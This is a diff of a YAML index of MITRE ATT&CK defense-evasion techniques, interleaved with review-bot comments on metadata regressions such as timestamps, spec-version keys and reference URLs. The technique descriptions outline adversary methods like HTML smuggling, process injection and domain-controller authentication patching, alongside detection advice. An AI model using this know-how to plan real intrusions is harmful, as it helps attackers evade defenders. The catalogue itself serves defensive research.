event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
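Review bot: the "Mandiant M-Trends 2020" reference URL moves from `content.fireeye.com` to a `mandiant.com` PDF but keeps "Retrieved April 24, 2020"; elsewhere in this patch a URL change comes with an updated retrieved date (nccgroup, Twitter/x.com), so this entry should follow the same rule. `x_mitre_permissions_required: User` is dropped here, and the equivalent fields go for T1556.001 and T1556.005 later in the patch; if the test generator or any index filters on that field, update it in the same change. The rest of the removed block from the previous hunk is re-added here in a different key order, so no references are lost.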
@@ -12127,7 +12382,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
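Review bot: the `modified` timestamp for T1055.009 goes backwards (`2021-04-29` to `2020-06-20`), and the same regression appears for T1601.001 (`2020-10-22`) and T1070.009 (`2023-04-11`) in the hunks below. This looks like the export now copies the upstream STIX `modified` value instead of a bundle-generation time; confirm that, because anything using `modified` for change detection will treat these objects as stale.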
@@ -12170,8 +12425,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
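Review bot: T1055.009 loses `x_mitre_attack_spec_version: 2.1.0` here without a `3.2.0` replacement being added anywhere in the hunk, unlike the other objects in this patch that are bumped to `3.2.0`. Verify the object still carries the field after the change; the same check applies to T1601.001 in the next hunk, which is edited the same way.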
@@ -12218,7 +12471,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -12284,12 +12537,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -12344,33 +12595,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
+ T1036.010:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
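Review bot: the T1036.010 description contains `\ \n\n` (an escaped space before the paragraph break) and a trailing space before the closing quote, which will round-trip into the rendered text; strip in the generator. T1070.009 keeps `x_mitre_attack_spec_version: 3.1.0` (context line at the top of the hunk) while its `modified` date changed and most other objects here move to `3.2.0`; check upstream for the expected value. The T1556.001 reference block removed here is re-added in the hunk below with reordered keys, so no references are lost.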
@@ -12391,6 +12693,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -12405,22 +12708,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12478,48 +12801,17 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests: []
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12541,6 +12833,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -12551,23 +12844,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
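Review bot: two schema-level changes in this hunk deserve a sentence in the commit message. The STIX `spec_version: '2.1'` key is removed near the end of the T1556.005 object and, as the later hunks show, from every other object in the file, and `x_mitre_permissions_required` (User, Administrator) disappears from T1556.005 with only a 1.0 to 1.1 version bump, while the same key survives as unchanged context on T1221, T1564.005 and T1055.015 below. Anything in this repository that filters on `spec_version` or displays required permissions should tolerate both keys being absent; please state whether the generator now drops `spec_version` on purpose or whether that is a side effect of the upstream bundle.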
@@ -12608,8 +12928,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
@@ -12645,43 +12966,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
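Review bot: no content change to review in this hunk, only key reordering: `x_mitre_version: '1.1'` is removed at the top of the T1070.004 object and re-added further down unchanged, so the `modified` jump from 2022-05-11 to 2024-10-15 comes from upstream metadata (the `revoked` and `x_mitre_deprecated` flags and the 3.2.0 spec version), not from a revised description. One thing worth checking is the unchanged description text, where `del`, `rm` and `unlink` each sit on a line of their own; that looks like inline code markup having been stripped when the description was converted, and since the regeneration reproduces it exactly, the loss predates this commit (or is an artefact of how the diff is rendered), so it should be tracked separately in the generator rather than patched by hand here.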
@@ -12692,18 +12993,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests: []
T1221:
@@ -12765,7 +13084,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
source_name: ryhanson phishery SEPT 2016
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
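Review bot: the `modified` timestamp for T1221 moves backwards, from 2022-05-11 to 2022-01-12, and the same regression appears for T1134, T1564.005, T1055.005, T1622, T1574.002, T1055.008 and T1027.007 further down. The old values all end in `14:00:00.188Z`, which looks like a bulk release stamp, whereas the new ones are per-object timestamps, so this is most likely a change in the source data rather than regeneration from a stale snapshot. Even so, the commit message should name the ATT&CK release the index was rebuilt from so the regression can be verified, and any tooling that treats a newer `modified` as "technique changed" will not flag these objects as updated.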
@@ -12795,13 +13114,11 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
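Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1221 in this hunk with no replacement, unlike T1070.004 where the key is re-added as 3.2.0; the same remove-only pattern shows up for T1564.005, T1055.005 and T1055.008 below. Please confirm the key is still emitted elsewhere in each of those objects after regeneration, since consumers that gate on the ATT&CK spec version will otherwise treat it as missing. T1622 and T1036.006 keep a per-object value (2.1.0 and 3.1.0) as unchanged context, so the file clearly intends every object to carry the key.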
@@ -12898,7 +13215,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
@@ -12961,7 +13277,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests: []
T1564.005:
@@ -12999,7 +13314,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -13026,8 +13341,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -13055,7 +13368,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -13099,8 +13412,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -13155,7 +13466,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -13175,7 +13486,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1036.006:
@@ -13225,7 +13535,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests: []
T1550.002:
@@ -13280,12 +13589,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1574.002:
technique:
